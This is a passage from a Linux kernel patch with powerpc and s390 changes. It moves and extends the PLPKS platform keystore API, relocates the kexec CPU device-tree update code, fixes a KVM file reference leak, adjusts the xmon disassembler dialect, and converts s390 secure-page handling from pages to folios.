++#define PLPKS_MAX_DATA_SIZE		4000
++
++// Timeouts for PLPKS operations
++#define PLPKS_MAX_TIMEOUT		(5 * USEC_PER_SEC)
++#define PLPKS_FLUSH_SLEEP		10000 // usec
++
++struct plpks_var {
++	char *component;
++	u8 *name;
++	u8 *data;
++	u32 policy;
++	u16 namelen;
++	u16 datalen;
++	u8 os;
++};
++
++struct plpks_var_name {
++	u8  *name;
++	u16 namelen;
++};
++
++struct plpks_var_name_list {
++	u32 varcount;
++	struct plpks_var_name varlist[];
++};
++
++/**
++ * Writes the specified var and its data to PKS.
++ * Any caller of PKS driver should present a valid component type for
++ * their variable.
++ */
++int plpks_write_var(struct plpks_var var);
++
++/**
++ * Removes the specified var and its data from PKS.
++ */
++int plpks_remove_var(char *component, u8 varos,
++		     struct plpks_var_name vname);
++
++/**
++ * Returns the data for the specified os variable.
++ */
++int plpks_read_os_var(struct plpks_var *var);
++
++/**
++ * Returns the data for the specified firmware variable.
++ */
++int plpks_read_fw_var(struct plpks_var *var);
++
++/**
++ * Returns the data for the specified bootloader variable.
++ */
++int plpks_read_bootloader_var(struct plpks_var *var);
++
++/**
++ * Returns if PKS is available on this LPAR.
++ */
++bool plpks_is_available(void);
++
++/**
++ * Returns version of the Platform KeyStore.
++ */
++u8 plpks_get_version(void);
++
++/**
++ * Returns hypervisor storage overhead per object, not including the size of
++ * the object or label. Only valid for config version >= 2
++ */
++u16 plpks_get_objoverhead(void);
++
++/**
++ * Returns maximum password size. Must be >= 32 bytes
++ */
++u16 plpks_get_maxpwsize(void);
++
++/**
++ * Returns maximum object size supported by Platform KeyStore.
++ */
++u16 plpks_get_maxobjectsize(void);
++
++/**
++ * Returns maximum object label size supported by Platform KeyStore.
++ */
++u16 plpks_get_maxobjectlabelsize(void);
++
++/**
++ * Returns total size of the configured Platform KeyStore.
++ */
++u32 plpks_get_totalsize(void);
++
++/**
++ * Returns used space from the total size of the Platform KeyStore.
++ */
++u32 plpks_get_usedspace(void);
++
++/**
++ * Returns bitmask of policies supported by the hypervisor.
++ */
++u32 plpks_get_supportedpolicies(void);
++
++/**
++ * Returns maximum byte size of a single object supported by the hypervisor.
++ * Only valid for config version >= 3
++ */
++u32 plpks_get_maxlargeobjectsize(void);
++
++/**
++ * Returns bitmask of signature algorithms supported for signed updates.
++ * Only valid for config version >= 3
++ */
++u64 plpks_get_signedupdatealgorithms(void);
++
++/**
++ * Returns the length of the PLPKS password in bytes.
++ */
++u16 plpks_get_passwordlen(void);
++
++#endif // CONFIG_PSERIES_PLPKS
++
++#endif // _ASM_POWERPC_PLPKS_H
+diff --git a/arch/powerpc/kernel/prom.c b/arch/powerpc/kernel/prom.c
+index 9531ab90feb8a..e5b90d67cd536 100644
+--- a/arch/powerpc/kernel/prom.c
++++ b/arch/powerpc/kernel/prom.c
+@@ -324,6 +324,7 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 					  void *data)
+ {
+ 	const char *type = of_get_flat_dt_prop(node, "device_type", NULL);
++	const __be32 *cpu_version = NULL;
+ 	const __be32 *prop;
+ 	const __be32 *intserv;
+ 	int i, nthreads;
+@@ -404,7 +405,7 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 		prop = of_get_flat_dt_prop(node, "cpu-version", NULL);
+ 		if (prop && (be32_to_cpup(prop) & 0xff000000) == 0x0f000000) {
+ 			identify_cpu(0, be32_to_cpup(prop));
+-			seq_buf_printf(&ppc_hw_desc, "0x%04x ", be32_to_cpup(prop));
++			cpu_version = prop;
+ 		}
+ 
+ 		check_cpu_feature_properties(node);
+@@ -415,6 +416,12 @@ static int __init early_init_dt_scan_cpus(unsigned long node,
+ 	}
+ 
+ 	identical_pvr_fixup(node);
++
++	// We can now add the CPU name & PVR to the hardware description
++	seq_buf_printf(&ppc_hw_desc, "%s 0x%04lx ", cur_cpu_spec->cpu_name, mfspr(SPRN_PVR));
++	if (cpu_version)
++		seq_buf_printf(&ppc_hw_desc, "0x%04x ", be32_to_cpup(cpu_version));
++
+ 	init_mmu_slb_size(node);
+ 
+ #ifdef CONFIG_PPC64
+@@ -852,9 +859,6 @@ void __init early_init_devtree(void *params)
+ 
+ 	dt_cpu_ftrs_scan();
+ 
+-	// We can now add the CPU name & PVR to the hardware description
+-	seq_buf_printf(&ppc_hw_desc, "%s 0x%04lx ", cur_cpu_spec->cpu_name, mfspr(SPRN_PVR));
+-
+ 	/* Retrieve CPU related informations from the flat tree
+ 	 * (altivec support, boot CPU ID, ...)
+ 	 */
+diff --git a/arch/powerpc/kexec/core_64.c b/arch/powerpc/kexec/core_64.c
+index e465e44877376..653b3c8c6a530 100644
+--- a/arch/powerpc/kexec/core_64.c
++++ b/arch/powerpc/kexec/core_64.c
+@@ -17,6 +17,7 @@
+ #include <linux/cpu.h>
+ #include <linux/hardirq.h>
+ #include <linux/of.h>
++#include <linux/libfdt.h>
+ 
+ #include <asm/page.h>
+ #include <asm/current.h>
+@@ -31,6 +32,7 @@
+ #include <asm/hw_breakpoint.h>
+ #include <asm/svm.h>
+ #include <asm/ultravisor.h>
++#include <asm/crashdump-ppc64.h>
+ 
+ int machine_kexec_prepare(struct kimage *image)
+ {
+@@ -431,3 +433,113 @@ static int __init export_htab_values(void)
+ }
+ late_initcall(export_htab_values);
+ #endif /* CONFIG_PPC_64S_HASH_MMU */
++
++#if defined(CONFIG_KEXEC_FILE) || defined(CONFIG_CRASH_DUMP)
++/**
++ * add_node_props - Reads node properties from device node structure and add
++ *                  them to fdt.
++ * @fdt:            Flattened device tree of the kernel
++ * @node_offset:    offset of the node to add a property at
++ * @dn:             device node pointer
++ *
++ * Returns 0 on success, negative errno on error.
++ */
++static int add_node_props(void *fdt, int node_offset, const struct device_node *dn)
++{
++	int ret = 0;
++	struct property *pp;
++
++	if (!dn)
++		return -EINVAL;
++
++	for_each_property_of_node(dn, pp) {
++		ret = fdt_setprop(fdt, node_offset, pp->name, pp->value, pp->length);
++		if (ret < 0) {
++			pr_err("Unable to add %s property: %s\n", pp->name, fdt_strerror(ret));
++			return ret;
++		}
++	}
++	return ret;
++}
++
++/**
++ * update_cpus_node - Update cpus node of flattened device tree using of_root
++ *                    device node.
++ * @fdt:              Flattened device tree of the kernel.
++ *
++ * Returns 0 on success, negative errno on error.
++ *
++ * Note: expecting no subnodes under /cpus/<node> with device_type == "cpu".
++ * If this changes, update this function to include them.
++ */
++int update_cpus_node(void *fdt)
++{
++	int prev_node_offset;
++	const char *device_type;
++	const struct fdt_property *prop;
++	struct device_node *cpus_node, *dn;
++	int cpus_offset, cpus_subnode_offset, ret = 0;
++
++	cpus_offset = fdt_path_offset(fdt, "/cpus");
++	if (cpus_offset < 0 && cpus_offset != -FDT_ERR_NOTFOUND) {
++		pr_err("Malformed device tree: error reading /cpus node: %s\n",
++		       fdt_strerror(cpus_offset));
++		return cpus_offset;
++	}
++
++	prev_node_offset = cpus_offset;
++	/* Delete sub-nodes of /cpus node with device_type == "cpu" */
++	for (cpus_subnode_offset = fdt_first_subnode(fdt, cpus_offset); cpus_subnode_offset >= 0;) {
++		/* Ignore nodes that do not have a device_type property or device_type != "cpu" */
++		prop = fdt_get_property(fdt, cpus_subnode_offset, "device_type", NULL);
++		if (!prop || strcmp(prop->data, "cpu")) {
++			prev_node_offset = cpus_subnode_offset;
++			goto next_node;
++		}
++
++		ret = fdt_del_node(fdt, cpus_subnode_offset);
++		if (ret < 0) {
++			pr_err("Failed to delete a cpus sub-node: %s\n", fdt_strerror(ret));
++			return ret;
++		}
++next_node:
++		if (prev_node_offset == cpus_offset)
++			cpus_subnode_offset = fdt_first_subnode(fdt, cpus_offset);
++		else
++			cpus_subnode_offset = fdt_next_subnode(fdt, prev_node_offset);
++	}
++
++	cpus_node = of_find_node_by_path("/cpus");
++	/* Fail here to avoid kexec/kdump kernel boot hung */
++	if (!cpus_node) {
++		pr_err("No /cpus node found\n");
++		return -EINVAL;
++	}
++
++	/* Add all /cpus sub-nodes of device_type == "cpu" to FDT */
++	for_each_child_of_node(cpus_node, dn) {
++		/* Ignore device nodes that do not have a device_type property
++		 * or device_type != "cpu".
++		 */
++		device_type = of_get_property(dn, "device_type", NULL);
++		if (!device_type || strcmp(device_type, "cpu"))
++			continue;
++
++		cpus_subnode_offset = fdt_add_subnode(fdt, cpus_offset, dn->full_name);
++		if (cpus_subnode_offset < 0) {
++			pr_err("Unable to add %s subnode: %s\n", dn->full_name,
++			       fdt_strerror(cpus_subnode_offset));
++			ret = cpus_subnode_offset;
++			goto out;
++		}
++
++		ret = add_node_props(fdt, cpus_subnode_offset, dn);
++		if (ret < 0)
++			goto out;
++	}
++out:
++	of_node_put(cpus_node);
++	of_node_put(dn);
++	return ret;
++}
++#endif /* CONFIG_KEXEC_FILE || CONFIG_CRASH_DUMP */
+diff --git a/arch/powerpc/kexec/file_load_64.c b/arch/powerpc/kexec/file_load_64.c
+index 349a781cea0b3..180c1dfe4aa77 100644
+--- a/arch/powerpc/kexec/file_load_64.c
++++ b/arch/powerpc/kexec/file_load_64.c
+@@ -952,93 +952,6 @@ unsigned int kexec_extra_fdt_size_ppc64(struct kimage *image)
+ 	return (unsigned int)(usm_entries * sizeof(u64));
+ }
+ 
+-/**
+- * add_node_props - Reads node properties from device node structure and add
+- *                  them to fdt.
+- * @fdt:            Flattened device tree of the kernel
+- * @node_offset:    offset of the node to add a property at
+- * @dn:             device node pointer
+- *
+- * Returns 0 on success, negative errno on error.
+- */
+-static int add_node_props(void *fdt, int node_offset, const struct device_node *dn)
+-{
+-	int ret = 0;
+-	struct property *pp;
+-
+-	if (!dn)
+-		return -EINVAL;
+-
+-	for_each_property_of_node(dn, pp) {
+-		ret = fdt_setprop(fdt, node_offset, pp->name, pp->value, pp->length);
+-		if (ret < 0) {
+-			pr_err("Unable to add %s property: %s\n", pp->name, fdt_strerror(ret));
+-			return ret;
+-		}
+-	}
+-	return ret;
+-}
+-
+-/**
+- * update_cpus_node - Update cpus node of flattened device tree using of_root
+- *                    device node.
+- * @fdt:              Flattened device tree of the kernel.
+- *
+- * Returns 0 on success, negative errno on error.
+- */
+-static int update_cpus_node(void *fdt)
+-{
+-	struct device_node *cpus_node, *dn;
+-	int cpus_offset, cpus_subnode_offset, ret = 0;
+-
+-	cpus_offset = fdt_path_offset(fdt, "/cpus");
+-	if (cpus_offset < 0 && cpus_offset != -FDT_ERR_NOTFOUND) {
+-		pr_err("Malformed device tree: error reading /cpus node: %s\n",
+-		       fdt_strerror(cpus_offset));
+-		return cpus_offset;
+-	}
+-
+-	if (cpus_offset > 0) {
+-		ret = fdt_del_node(fdt, cpus_offset);
+-		if (ret < 0) {
+-			pr_err("Error deleting /cpus node: %s\n", fdt_strerror(ret));
+-			return -EINVAL;
+-		}
+-	}
+-
+-	/* Add cpus node to fdt */
+-	cpus_offset = fdt_add_subnode(fdt, fdt_path_offset(fdt, "/"), "cpus");
+-	if (cpus_offset < 0) {
+-		pr_err("Error creating /cpus node: %s\n", fdt_strerror(cpus_offset));
+-		return -EINVAL;
+-	}
+-
+-	/* Add cpus node properties */
+-	cpus_node = of_find_node_by_path("/cpus");
+-	ret = add_node_props(fdt, cpus_offset, cpus_node);
+-	of_node_put(cpus_node);
+-	if (ret < 0)
+-		return ret;
+-
+-	/* Loop through all subnodes of cpus and add them to fdt */
+-	for_each_node_by_type(dn, "cpu") {
+-		cpus_subnode_offset = fdt_add_subnode(fdt, cpus_offset, dn->full_name);
+-		if (cpus_subnode_offset < 0) {
+-			pr_err("Unable to add %s subnode: %s\n", dn->full_name,
+-			       fdt_strerror(cpus_subnode_offset));
+-			ret = cpus_subnode_offset;
+-			goto out;
+-		}
+-
+-		ret = add_node_props(fdt, cpus_subnode_offset, dn);
+-		if (ret < 0)
+-			goto out;
+-	}
+-out:
+-	of_node_put(dn);
+-	return ret;
+-}
+-
+ static int copy_property(void *fdt, int node_offset, const struct device_node *dn,
+ 			 const char *propname)
+ {
+diff --git a/arch/powerpc/kvm/powerpc.c b/arch/powerpc/kvm/powerpc.c
+index b850b0efa201a..98ac5d39ad9cf 100644
+--- a/arch/powerpc/kvm/powerpc.c
++++ b/arch/powerpc/kvm/powerpc.c
+@@ -1998,8 +1998,10 @@ static int kvm_vcpu_ioctl_enable_cap(struct kvm_vcpu *vcpu,
+ 			break;
+ 
+ 		r = -ENXIO;
+-		if (!xive_enabled())
++		if (!xive_enabled()) {
++			fdput(f);
+ 			break;
++		}
+ 
+ 		r = -EPERM;
+ 		dev = kvm_device_from_filp(f.file);
+diff --git a/arch/powerpc/platforms/pseries/plpks.c b/arch/powerpc/platforms/pseries/plpks.c
+index 25f95440a773b..d1eb6f0433fe7 100644
+--- a/arch/powerpc/platforms/pseries/plpks.c
++++ b/arch/powerpc/platforms/pseries/plpks.c
+@@ -18,15 +18,23 @@
+ #include <linux/types.h>
+ #include <asm/hvcall.h>
+ #include <asm/machdep.h>
+-
+-#include "plpks.h"
++#include <asm/plpks.h>
++#include <asm/firmware.h>
+ 
+ static u8 *ospassword;
+ static u16 ospasswordlength;
+ 
+ // Retrieved with H_PKS_GET_CONFIG
++static u8 version;
++static u16 objoverhead;
+ static u16 maxpwsize;
+ static u16 maxobjsize;
++static s16 maxobjlabelsize;
++static u32 totalsize;
++static u32 usedspace;
++static u32 supportedpolicies;
++static u32 maxlargeobjectsize;
++static u64 signedupdatealgorithms;
+ 
+ struct plpks_auth {
+ 	u8 version;
+@@ -113,7 +121,8 @@ static int plpks_gen_password(void)
+ 	u8 *password, consumer = PLPKS_OS_OWNER;
+ 	int rc;
+ 
+-	password = kzalloc(maxpwsize, GFP_KERNEL);
++	// The password must not cross a page boundary, so we align to the next power of 2
++	password = kzalloc(roundup_pow_of_two(maxpwsize), GFP_KERNEL);
+ 	if (!password)
+ 		return -ENOMEM;
+ 
+@@ -149,7 +158,9 @@ static struct plpks_auth *construct_auth(u8 consumer)
+ 	if (consumer > PLPKS_OS_OWNER)
+ 		return ERR_PTR(-EINVAL);
+ 
+-	auth = kzalloc(struct_size(auth, password, maxpwsize), GFP_KERNEL);
++	// The auth structure must not cross a page boundary and must be
++	// 16 byte aligned. We align to the next largest power of 2
++	auth = kzalloc(roundup_pow_of_two(struct_size(auth, password, maxpwsize)), GFP_KERNEL);
+ 	if (!auth)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -183,7 +194,8 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ 	if (component && slen > sizeof(label->attr.prefix))
+ 		return ERR_PTR(-EINVAL);
+ 
+-	label = kzalloc(sizeof(*label), GFP_KERNEL);
++	// The label structure must not cross a page boundary, so we align to the next power of 2
++	label = kzalloc(roundup_pow_of_two(sizeof(*label)), GFP_KERNEL);
+ 	if (!label)
+ 		return ERR_PTR(-ENOMEM);
+ 
+@@ -203,32 +215,157 @@ static struct label *construct_label(char *component, u8 varos, u8 *name,
+ static int _plpks_get_config(void)
+ {
+ 	unsigned long retbuf[PLPAR_HCALL_BUFSIZE] = { 0 };
+-	struct {
++	struct config {
+ 		u8 version;
+ 		u8 flags;
+-		__be32 rsvd0;
++		__be16 rsvd0;
++		__be16 objoverhead;
+ 		__be16 maxpwsize;
+ 		__be16 maxobjlabelsize;
+ 		__be16 maxobjsize;
+ 		__be32 totalsize;
+ 		__be32 usedspace;
+ 		__be32 supportedpolicies;
+-		__be64 rsvd1;
+-	} __packed config;
++		__be32 maxlargeobjectsize;
++		__be64 signedupdatealgorithms;
++		u8 rsvd1[476];
++	} __packed * config;
+ 	size_t size;
+-	int rc;
++	int rc = 0;
++
++	size = sizeof(*config);
++
++	// Config struct must not cross a page boundary. So long as the struct
++	// size is a power of 2, this should be fine as alignment is guaranteed
++	config = kzalloc(size, GFP_KERNEL);
++	if (!config) {
++		rc = -ENOMEM;
++		goto err;
++	}
++
++	rc = plpar_hcall(H_PKS_GET_CONFIG, retbuf, virt_to_phys(config), size);
++
++	if (rc != H_SUCCESS) {
++		rc = pseries_status_to_err(rc);
++		goto err;
++	}
++
++	version = config->version;
++	objoverhead = be16_to_cpu(config->objoverhead);
++	maxpwsize = be16_to_cpu(config->maxpwsize);
++	maxobjsize = be16_to_cpu(config->maxobjsize);
++	maxobjlabelsize = be16_to_cpu(config->maxobjlabelsize);
++	totalsize = be32_to_cpu(config->totalsize);
++	usedspace = be32_to_cpu(config->usedspace);
++	supportedpolicies = be32_to_cpu(config->supportedpolicies);
++	maxlargeobjectsize = be32_to_cpu(config->maxlargeobjectsize);
++	signedupdatealgorithms = be64_to_cpu(config->signedupdatealgorithms);
++
++	// Validate that the numbers we get back match the requirements of the spec
++	if (maxpwsize < 32) {
++		pr_err("Invalid Max Password Size received from hypervisor (%d < 32)\n", maxpwsize);
++		rc = -EIO;
++		goto err;
++	}
++
++	if (maxobjlabelsize < 255) {
++		pr_err("Invalid Max Object Label Size received from hypervisor (%d < 255)\n",
++		       maxobjlabelsize);
++		rc = -EIO;
++		goto err;
++	}
++
++	if (totalsize < 4096) {
++		pr_err("Invalid Total Size received from hypervisor (%d < 4096)\n", totalsize);
++		rc = -EIO;
++		goto err;
++	}
++
++	if (version >= 3 && maxlargeobjectsize >= 65536 && maxobjsize != 0xFFFF) {
++		pr_err("Invalid Max Object Size (0x%x != 0xFFFF)\n", maxobjsize);
++		rc = -EIO;
++		goto err;
++	}
++
++err:
++	kfree(config);
++	return rc;
++}
++
++u8 plpks_get_version(void)
++{
++	return version;
++}
++
++u16 plpks_get_objoverhead(void)
++{
++	return objoverhead;
++}
++
++u16 plpks_get_maxpwsize(void)
++{
++	return maxpwsize;
++}
++
++u16 plpks_get_maxobjectsize(void)
++{
++	return maxobjsize;
++}
++
++u16 plpks_get_maxobjectlabelsize(void)
++{
++	return maxobjlabelsize;
++}
++
++u32 plpks_get_totalsize(void)
++{
++	return totalsize;
++}
++
++u32 plpks_get_usedspace(void)
++{
++	// Unlike other config values, usedspace regularly changes as objects
++	// are updated, so we need to refresh.
++	int rc = _plpks_get_config();
++	if (rc) {
++		pr_err("Couldn't get config, rc: %d\n", rc);
++		return 0;
++	}
++	return usedspace;
++}
+ 
+-	size = sizeof(config);
++u32 plpks_get_supportedpolicies(void)
++{
++	return supportedpolicies;
++}
+ 
+-	rc = plpar_hcall(H_PKS_GET_CONFIG, retbuf, virt_to_phys(&config), size);
++u32 plpks_get_maxlargeobjectsize(void)
++{
++	return maxlargeobjectsize;
++}
+ 
+-	if (rc != H_SUCCESS)
+-		return pseries_status_to_err(rc);
++u64 plpks_get_signedupdatealgorithms(void)
++{
++	return signedupdatealgorithms;
++}
+ 
+-	maxpwsize = be16_to_cpu(config.maxpwsize);
+-	maxobjsize = be16_to_cpu(config.maxobjsize);
++u16 plpks_get_passwordlen(void)
++{
++	return ospasswordlength;
++}
++
++bool plpks_is_available(void)
++{
++	int rc;
++
++	if (!firmware_has_feature(FW_FEATURE_LPAR))
++		return false;
++
++	rc = _plpks_get_config();
++	if (rc)
++		return false;
+ 
+-	return 0;
++	return true;
+ }
+ 
+ static int plpks_confirm_object_flushed(struct label *label,
+diff --git a/arch/powerpc/platforms/pseries/plpks.h b/arch/powerpc/platforms/pseries/plpks.h
+deleted file mode 100644
+index 07278a990c2df..0000000000000
+--- a/arch/powerpc/platforms/pseries/plpks.h
++++ /dev/null
+@@ -1,96 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-/*
+- * Copyright (C) 2022 IBM Corporation
+- * Author: Nayna Jain <nayna@linux.ibm.com>
+- *
+- * Platform keystore for pseries LPAR(PLPKS).
+- */
+-
+-#ifndef _PSERIES_PLPKS_H
+-#define _PSERIES_PLPKS_H
+-
+-#include <linux/types.h>
+-#include <linux/list.h>
+-
+-// Object policy flags from supported_policies
+-#define PLPKS_OSSECBOOTAUDIT	PPC_BIT32(1) // OS secure boot must be audit/enforce
+-#define PLPKS_OSSECBOOTENFORCE	PPC_BIT32(2) // OS secure boot must be enforce
+-#define PLPKS_PWSET		PPC_BIT32(3) // No access without password set
+-#define PLPKS_WORLDREADABLE	PPC_BIT32(4) // Readable without authentication
+-#define PLPKS_IMMUTABLE		PPC_BIT32(5) // Once written, object cannot be removed
+-#define PLPKS_TRANSIENT		PPC_BIT32(6) // Object does not persist through reboot
+-#define PLPKS_SIGNEDUPDATE	PPC_BIT32(7) // Object can only be modified by signed updates
+-#define PLPKS_HVPROVISIONED	PPC_BIT32(28) // Hypervisor has provisioned this object
+-
+-// Signature algorithm flags from signed_update_algorithms
+-#define PLPKS_ALG_RSA2048	PPC_BIT(0)
+-#define PLPKS_ALG_RSA4096	PPC_BIT(1)
+-
+-// Object label OS metadata flags
+-#define PLPKS_VAR_LINUX		0x02
+-#define PLPKS_VAR_COMMON	0x04
+-
+-// Flags for which consumer owns an object is owned by
+-#define PLPKS_FW_OWNER			0x1
+-#define PLPKS_BOOTLOADER_OWNER		0x2
+-#define PLPKS_OS_OWNER			0x3
+-
+-// Flags for label metadata fields
+-#define PLPKS_LABEL_VERSION		0
+-#define PLPKS_MAX_LABEL_ATTR_SIZE	16
+-#define PLPKS_MAX_NAME_SIZE		239
+-#define PLPKS_MAX_DATA_SIZE		4000
+-
+-// Timeouts for PLPKS operations
+-#define PLPKS_MAX_TIMEOUT		(5 * USEC_PER_SEC)
+-#define PLPKS_FLUSH_SLEEP		10000 // usec
+-
+-struct plpks_var {
+-	char *component;
+-	u8 *name;
+-	u8 *data;
+-	u32 policy;
+-	u16 namelen;
+-	u16 datalen;
+-	u8 os;
+-};
+-
+-struct plpks_var_name {
+-	u8  *name;
+-	u16 namelen;
+-};
+-
+-struct plpks_var_name_list {
+-	u32 varcount;
+-	struct plpks_var_name varlist[];
+-};
+-
+-/**
+- * Writes the specified var and its data to PKS.
+- * Any caller of PKS driver should present a valid component type for
+- * their variable.
+- */
+-int plpks_write_var(struct plpks_var var);
+-
+-/**
+- * Removes the specified var and its data from PKS.
+- */
+-int plpks_remove_var(char *component, u8 varos,
+-		     struct plpks_var_name vname);
+-
+-/**
+- * Returns the data for the specified os variable.
+- */
+-int plpks_read_os_var(struct plpks_var *var);
+-
+-/**
+- * Returns the data for the specified firmware variable.
+- */
+-int plpks_read_fw_var(struct plpks_var *var);
+-
+-/**
+- * Returns the data for the specified bootloader variable.
+- */
+-int plpks_read_bootloader_var(struct plpks_var *var);
+-
+-#endif
+diff --git a/arch/powerpc/xmon/ppc-dis.c b/arch/powerpc/xmon/ppc-dis.c
+index 75fa98221d485..af105e1bc3fca 100644
+--- a/arch/powerpc/xmon/ppc-dis.c
++++ b/arch/powerpc/xmon/ppc-dis.c
+@@ -122,32 +122,21 @@ int print_insn_powerpc (unsigned long insn, unsigned long memaddr)
+   bool insn_is_short;
+   ppc_cpu_t dialect;
+ 
+-  dialect = PPC_OPCODE_PPC | PPC_OPCODE_COMMON
+-            | PPC_OPCODE_64 | PPC_OPCODE_POWER4 | PPC_OPCODE_ALTIVEC;
++  dialect = PPC_OPCODE_PPC | PPC_OPCODE_COMMON;
+ 
+-  if (cpu_has_feature(CPU_FTRS_POWER5))
+-    dialect |= PPC_OPCODE_POWER5;
++  if (IS_ENABLED(CONFIG_PPC64))
++    dialect |= PPC_OPCODE_64 | PPC_OPCODE_POWER4 | PPC_OPCODE_CELL |
++	PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7 | PPC_OPCODE_POWER8 |
++	PPC_OPCODE_POWER9;
+ 
+-  if (cpu_has_feature(CPU_FTRS_CELL))
+-    dialect |= (PPC_OPCODE_CELL | PPC_OPCODE_ALTIVEC);
++  if (cpu_has_feature(CPU_FTR_TM))
++    dialect |= PPC_OPCODE_HTM;
+ 
+-  if (cpu_has_feature(CPU_FTRS_POWER6))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_ALTIVEC);
++  if (cpu_has_feature(CPU_FTR_ALTIVEC))
++    dialect |= PPC_OPCODE_ALTIVEC | PPC_OPCODE_ALTIVEC2;
+ 
+-  if (cpu_has_feature(CPU_FTRS_POWER7))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7
+-                | PPC_OPCODE_ALTIVEC | PPC_OPCODE_VSX);
+-
+-  if (cpu_has_feature(CPU_FTRS_POWER8))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7
+-		| PPC_OPCODE_POWER8 | PPC_OPCODE_HTM
+-		| PPC_OPCODE_ALTIVEC | PPC_OPCODE_ALTIVEC2 | PPC_OPCODE_VSX);
+-
+-  if (cpu_has_feature(CPU_FTRS_POWER9))
+-    dialect |= (PPC_OPCODE_POWER5 | PPC_OPCODE_POWER6 | PPC_OPCODE_POWER7
+-		| PPC_OPCODE_POWER8 | PPC_OPCODE_POWER9 | PPC_OPCODE_HTM
+-		| PPC_OPCODE_ALTIVEC | PPC_OPCODE_ALTIVEC2
+-		| PPC_OPCODE_VSX | PPC_OPCODE_VSX3);
++  if (cpu_has_feature(CPU_FTR_VSX))
++    dialect |= PPC_OPCODE_VSX | PPC_OPCODE_VSX3;
+ 
+   /* Get the major opcode of the insn.  */
+   opcode = NULL;
+diff --git a/arch/s390/kernel/uv.c b/arch/s390/kernel/uv.c
+index 5caa0ed2b594a..1ae7a04038049 100644
+--- a/arch/s390/kernel/uv.c
++++ b/arch/s390/kernel/uv.c
+@@ -172,36 +172,36 @@ int uv_convert_owned_from_secure(unsigned long paddr)
+ }
+ 
+ /*
+- * Calculate the expected ref_count for a page that would otherwise have no
++ * Calculate the expected ref_count for a folio that would otherwise have no
+  * further pins. This was cribbed from similar functions in other places in
+  * the kernel, but with some slight modifications. We know that a secure
+- * page can not be a huge page for example.
++ * folio can not be a large folio, for example.
+  */
+-static int expected_page_refs(struct page *page)
++static int expected_folio_refs(struct folio *folio)
+ {
+ 	int res;
+ 
+-	res = page_mapcount(page);
+-	if (PageSwapCache(page)) {
++	res = folio_mapcount(folio);
++	if (folio_test_swapcache(folio)) {
+ 		res++;
+-	} else if (page_mapping(page)) {
++	} else if (folio_mapping(folio)) {
+ 		res++;
+-		if (page_has_private(page))
++		if (folio->private)
+ 			res++;
+ 	}
+ 	return res;
+ }
+ 
+-static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
++static int make_folio_secure(struct folio *folio, struct uv_cb_header *uvcb)
+ {
+ 	int expected, cc = 0;
+ 
+-	if (PageWriteback(page))
++	if (folio_test_writeback(folio))
+ 		return -EAGAIN;
+-	expected = expected_page_refs(page);
+-	if (!page_ref_freeze(page, expected))
++	expected = expected_folio_refs(folio);
++	if (!folio_ref_freeze(folio, expected))
+ 		return -EBUSY;
+-	set_bit(PG_arch_1, &page->flags);
++	set_bit(PG_arch_1, &folio->flags);
+ 	/*
+ 	 * If the UVC does not succeed or fail immediately, we don't want to
+ 	 * loop for long, or we might get stall notifications.
+@@ -211,9 +211,9 @@ static int make_page_secure(struct page *page, struct uv_cb_header *uvcb)
+ 	 * -EAGAIN and we let the callers deal with it.
+ 	 */
+ 	cc = __uv_call(0, (u64)uvcb);
+-	page_ref_unfreeze(page, expected);
++	folio_ref_unfreeze(folio, expected);
+ 	/*
+-	 * Return -ENXIO if the page was not mapped, -EINVAL for other errors.
++	 * Return -ENXIO if the folio was not mapped, -EINVAL for other errors.
+ 	 * If busy or partially completed, return -EAGAIN.
+ 	 */
+ 	if (cc == UVC_CC_OK)
+@@ -261,7 +261,7 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 	bool local_drain = false;
+ 	spinlock_t *ptelock;
+ 	unsigned long uaddr;
+-	struct page *page;
++	struct folio *folio;
+ 	pte_t *ptep;
+ 	int rc;
+ 
+@@ -288,15 +288,26 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 	rc = -ENXIO;
+ 	ptep = get_locked_pte(gmap->mm, uaddr, &ptelock);
+ 	if (pte_present(*ptep) && !(pte_val(*ptep) & _PAGE_INVALID) && pte_write(*ptep)) {
+-		page = pte_page(*ptep);
++		folio = page_folio(pte_page(*ptep));
++		rc = -EINVAL;
++		if (folio_test_large(folio))
++			goto unlock;
+ 		rc = -EAGAIN;
+-		if (trylock_page(page)) {
++		if (folio_trylock(folio)) {
+ 			if (should_export_before_import(uvcb, gmap->mm))
+-				uv_convert_from_secure(page_to_phys(page));
+-			rc = make_page_secure(page, uvcb);
+-			unlock_page(page);
++				uv_convert_from_secure(PFN_PHYS(folio_pfn(folio)));
++			rc = make_folio_secure(folio, uvcb);
++			folio_unlock(folio);
+ 		}
++
++		/*
++		 * Once we drop the PTL, the folio may get unmapped and
++		 * freed immediately. We need a temporary reference.
++		 */
++		if (rc == -EAGAIN)
++			folio_get(folio);
+ 	}
++unlock:
+ 	pte_unmap_unlock(ptep, ptelock);
+ out:
+ 	mmap_read_unlock(gmap->mm);
+@@ -306,10 +317,11 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 		 * If we are here because the UVC returned busy or partial
+ 		 * completion, this is just a useless check, but it is safe.
+ 		 */
+-		wait_on_page_writeback(page);
++		folio_wait_writeback(folio);
++		folio_put(folio);
+ 	} else if (rc == -EBUSY) {
+ 		/*
+-		 * If we have tried a local drain and the page refcount
++		 * If we have tried a local drain and the folio refcount
+ 		 * still does not match our expected safe value, try with a
+ 		 * system wide drain. This is needed if the pagevecs holding
+ 		 * the page are on a different CPU.
+@@ -320,7 +332,7 @@ int gmap_make_secure(struct gmap *gmap, unsigned long gaddr, void *uvcb)
+ 			return -EAGAIN;
+ 		}
+ 		/*
+-		 * We are here if the page refcount does not match the
++		 * We are here if the folio refcount does not match the
+ 		 * expected safe value. The main culprits are usually
